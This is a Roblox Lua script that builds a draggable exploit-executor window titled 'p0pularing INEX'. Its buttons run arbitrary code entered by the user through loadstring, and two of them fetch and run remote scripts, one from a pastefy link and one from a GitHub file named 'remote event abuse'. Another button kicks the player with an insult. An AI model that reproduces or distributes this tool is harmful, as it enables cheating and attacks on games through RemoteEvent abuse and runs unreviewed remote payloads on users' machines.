local Players = game:GetService("Players") local StarterGui = game:GetService("StarterGui") local UserInputService = game:GetService("UserInputService") local player = Players.LocalPlayer local playerGui = player:WaitForChild("PlayerGui") local device = "Unknown" if UserInputService.TouchEnabled and not UserInputService.KeyboardEnabled then device = "Mobile" elseif UserInputService.GamepadEnabled and not UserInputService.KeyboardEnabled then device = "Console" else device = "PC" end StarterGui:SetCore("SendNotification", { Title = "Device Detected"; Text = "You're using: " .. device; Duration = 5; }) local screenGui = Instance.new("ScreenGui") screenGui.Name = "INEX_GUI" screenGui.IgnoreGuiInset = true screenGui.ResetOnSpawn = false screenGui.Parent = playerGui local tablet = Instance.new("Frame") tablet.Size = UDim2.new(0.7, 0, 0.7, 0) tablet.Position = UDim2.new(0.15, 0, 0.15, 0) tablet.BackgroundColor3 = Color3.fromRGB(0, 0, 0) tablet.BackgroundTransparency = 0.2 tablet.Parent = screenGui Instance.new("UICorner", tablet).CornerRadius = UDim.new(0, 20) local border = Instance.new("UIStroke") border.Color = Color3.fromRGB(255, 0, 0) border.Thickness = 3 border.Parent = tablet local title = Instance.new("TextLabel") title.AnchorPoint = Vector2.new(0.5, 0) title.Position = UDim2.new(0.5, 0, 0.02, 0) title.Size = UDim2.new(0.6, 0, 0.08, 0) title.BackgroundTransparency = 1 title.Text = "p0pularing INEX" title.TextColor3 = Color3.fromRGB(255, 255, 255) title.TextScaled = true title.Font = Enum.Font.GothamBold title.Parent = tablet local scriptBox = Instance.new("TextBox") scriptBox.Size = UDim2.new(0.9, 0, 0.5, 0) scriptBox.Position = UDim2.new(0.05, 0, 0.15, 0) scriptBox.ClearTextOnFocus = false scriptBox.MultiLine = true scriptBox.TextWrapped = true scriptBox.TextXAlignment = Enum.TextXAlignment.Left scriptBox.TextYAlignment = Enum.TextYAlignment.Top scriptBox.Font = Enum.Font.Code scriptBox.TextSize = 16 scriptBox.TextColor3 = Color3.fromRGB(255, 255, 255) scriptBox.BackgroundColor3 = Color3.fromRGB(0, 0, 0) scriptBox.BackgroundTransparency = 0.2 scriptBox.Parent = tablet Instance.new("UIStroke", scriptBox).Thickness = 2 Instance.new("UICorner", scriptBox).CornerRadius = UDim.new(0, 12) local function makeButton(name, text, size, pos) local b = Instance.new("TextButton") b.Name = name b.Size = size b.Position = pos b.Text = text b.BackgroundColor3 = Color3.fromRGB(0, 0, 0) b.BackgroundTransparency = 0.1 b.Font = Enum.Font.GothamBold b.TextScaled = true b.TextColor3 = Color3.fromRGB(255, 255, 255) Instance.new("UIStroke", b).Thickness = 2 Instance.new("UICorner", b).CornerRadius = UDim.new(0, 10) b.Parent = tablet return b end -- Buttons local executeBtn = makeButton("ExecuteBtn", "Execute Script", UDim2.new(0.25, 0, 0.08, 0), UDim2.new(0.05, 0, 0.75, 0)) local remoteEventBtn = makeButton("RemoteEventBtn", "Remote Event", UDim2.new(0.25, 0, 0.08, 0), UDim2.new(0.05, 0, 0.86, 0)) local clearBtn = makeButton("ClearBtn", "Clear Script", UDim2.new(0.25, 0, 0.08, 0), UDim2.new(0.35, 0, 0.75, 0)) local ultimateFinderBtn = makeButton("UltimateFinderBtn", "Ultimate Finder", UDim2.new(0.25, 0, 0.08, 0), UDim2.new(0.65, 0, 0.75, 0)) local consoleBtn = makeButton("ConsoleBtn", "Console", UDim2.new(0.25, 0, 0.08, 0), UDim2.new(0.35, 0, 0.86, 0)) local mysteryBtn = makeButton("MysteryBtn", "???", UDim2.new(0.25, 0, 0.08, 0), UDim2.new(0.65, 0, 0.86, 0)) local errorLabel = Instance.new("TextLabel") errorLabel.Size = UDim2.new(0.9, 0, 0.1, 0) errorLabel.Position = UDim2.new(0.05, 0, 0.9, 0) errorLabel.BackgroundTransparency = 1 errorLabel.TextColor3 = Color3.fromRGB(255, 100, 100) errorLabel.TextScaled = true errorLabel.Font = Enum.Font.GothamBold errorLabel.Visible = false errorLabel.Parent = tablet -- Button logic executeBtn.MouseButton1Click:Connect(function() if scriptBox.Text == "" then errorLabel.Text = "No script to execute!" errorLabel.Visible = true task.delay(2, function() errorLabel.Visible = false end) return end pcall(function() loadstring(scriptBox.Text)() end) end) clearBtn.MouseButton1Click:Connect(function() scriptBox.Text = "" end) ultimateFinderBtn.MouseButton1Click:Connect(function() pcall(function() loadstring(game:HttpGet("https://pastefy.app/MVGE6jSU/raw?part=ULTIMATE_FINDER"))() end) end) remoteEventBtn.MouseButton1Click:Connect(function() pcall(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/v0c0n1337/scripts/refs/heads/main/remote%20event%20abuse.txt"))() end) end) consoleBtn.MouseButton1Click:Connect(function() StarterGui:SetCore("DevConsoleVisible", true) end) mysteryBtn.MouseButton1Click:Connect(function() player:Kick("fooled your dumbass LMFAO") end) -- Dragging local dragging, dragStart, startPos tablet.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = tablet.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) UserInputService.InputChanged:Connect(function(input) if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then local delta = input.Position - dragStart tablet.Position = UDim2.new( startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y ) end end)